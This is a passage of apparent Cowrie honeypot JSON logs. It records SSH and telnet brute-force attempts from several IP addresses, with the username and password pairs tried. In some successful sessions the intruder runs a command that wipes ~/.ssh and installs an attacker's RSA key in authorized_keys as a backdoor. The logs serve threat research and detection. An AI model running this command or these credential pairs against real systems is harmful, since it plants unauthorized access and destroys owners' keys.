03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:25:16.430274Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.login.success","username":"root","password":"5201314a","message":"login attempt [root/5201314a] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:25:17.166390Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:25:17.532215Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:25:17.532927Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:25:17.533714Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:17.710329Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:25:18.182533Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:25:18.183205Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:25:18.358527Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:18.359476Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":47856,"dst_ip":"1.2.3.4","dst_port":22,"session":"d78f494306f8","protocol":"ssh","message":"New connection: 103.206.72.2:47856 (1.2.3.4:22) [session: d78f494306f8]","sensor":"my-vps","timestamp":"2025-09-08T20:25:18.527985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:25:18.528939Z","src_ip":"103.206.72.2","session":"d78f494306f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:25:18.700402Z","src_ip":"103.206.72.2","session":"d78f494306f8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:25:19.390879Z","src_ip":"103.206.72.2","session":"d78f494306f8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:20.564530Z","src_ip":"103.206.72.2","session":"d78f494306f8"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":47860,"dst_ip":"1.2.3.4","dst_port":22,"session":"97c6d40c6a5f","protocol":"ssh","message":"New connection: 103.206.72.2:47860 (1.2.3.4:22) [session: 97c6d40c6a5f]","sensor":"my-vps","timestamp":"2025-09-08T20:25:20.741598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:25:20.742252Z","src_ip":"103.206.72.2","session":"97c6d40c6a5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:25:20.921994Z","src_ip":"103.206.72.2","session":"97c6d40c6a5f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:25:21.675116Z","src_ip":"103.206.72.2","session":"97c6d40c6a5f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:21.853945Z","src_ip":"103.206.72.2","session":"97c6d40c6a5f"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:21.854829Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38833,"dst_ip":"1.2.3.4","dst_port":23,"session":"f2f789087212","protocol":"telnet","message":"New connection: 212.227.235.229:38833 (1.2.3.4:23) [session: f2f789087212]","sensor":"my-vps","timestamp":"2025-09-08T20:25:36.519255Z"}
{"eventid":"cowrie.session.closed","duration":13.319106101989746,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:49.838297Z","src_ip":"212.227.235.229","session":"f2f789087212"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":39248,"dst_ip":"1.2.3.4","dst_port":22,"session":"f91af3879204","protocol":"ssh","message":"New connection: 77.75.56.63:39248 (1.2.3.4:22) [session: f91af3879204]","sensor":"my-vps","timestamp":"2025-09-08T20:26:06.491520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:26:06.492698Z","src_ip":"77.75.56.63","session":"f91af3879204"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:26:06.670993Z","src_ip":"77.75.56.63","session":"f91af3879204"}
{"eventid":"cowrie.login.failed","username":"roo","password":"P@ssw0rd","message":"login attempt [roo/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T20:26:07.379295Z","src_ip":"77.75.56.63","session":"f91af3879204"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:26:08.598776Z","src_ip":"77.75.56.63","session":"f91af3879204"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":41104,"dst_ip":"1.2.3.4","dst_port":22,"session":"5041a99f35df","protocol":"ssh","message":"New connection: 103.206.72.2:41104 (1.2.3.4:22) [session: 5041a99f35df]","sensor":"my-vps","timestamp":"2025-09-08T20:26:35.442064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:26:35.444450Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:26:35.616435Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@123456..","message":"login attempt [root/Aa@123456..] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:26:36.311206Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:26:36.719692Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:26:36.720498Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:26:36.721248Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:26:36.897322Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:26:37.264623Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:26:37.265293Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:26:37.439646Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:26:37.440539Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":41214,"dst_ip":"1.2.3.4","dst_port":22,"session":"8df57884dfb0","protocol":"ssh","message":"New connection: 103.206.72.2:41214 (1.2.3.4:22) [session: 8df57884dfb0]","sensor":"my-vps","timestamp":"2025-09-08T20:26:37.610500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:26:37.611492Z","src_ip":"103.206.72.2","session":"8df57884dfb0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:26:37.788080Z","src_ip":"103.206.72.2","session":"8df57884dfb0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:26:38.523741Z","src_ip":"103.206.72.2","session":"8df57884dfb0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:26:39.700091Z","src_ip":"103.206.72.2","session":"8df57884dfb0"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":41218,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d74334c140e","protocol":"ssh","message":"New connection: 103.206.72.2:41218 (1.2.3.4:22) [session: 8d74334c140e]","sensor":"my-vps","timestamp":"2025-09-08T20:26:39.878642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:26:39.880835Z","src_ip":"103.206.72.2","session":"8d74334c140e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:26:40.058043Z","src_ip":"103.206.72.2","session":"8d74334c140e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:26:40.777397Z","src_ip":"103.206.72.2","session":"8d74334c140e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:26:40.959916Z","src_ip":"103.206.72.2","session":"8d74334c140e"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:26:40.960778Z","src_ip":"103.206.72.2","session":"5041a99f35df"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":37390,"dst_ip":"1.2.3.4","dst_port":22,"session":"b41acbd13bd5","protocol":"ssh","message":"New connection: 216.107.136.92:37390 (1.2.3.4:22) [session: b41acbd13bd5]","sensor":"my-vps","timestamp":"2025-09-08T20:26:49.470958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:26:49.471828Z","src_ip":"216.107.136.92","session":"b41acbd13bd5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:26:49.561931Z","src_ip":"216.107.136.92","session":"b41acbd13bd5"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator@123","message":"login attempt [operator/operator@123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:26:49.963046Z","src_ip":"216.107.136.92","session":"b41acbd13bd5"}
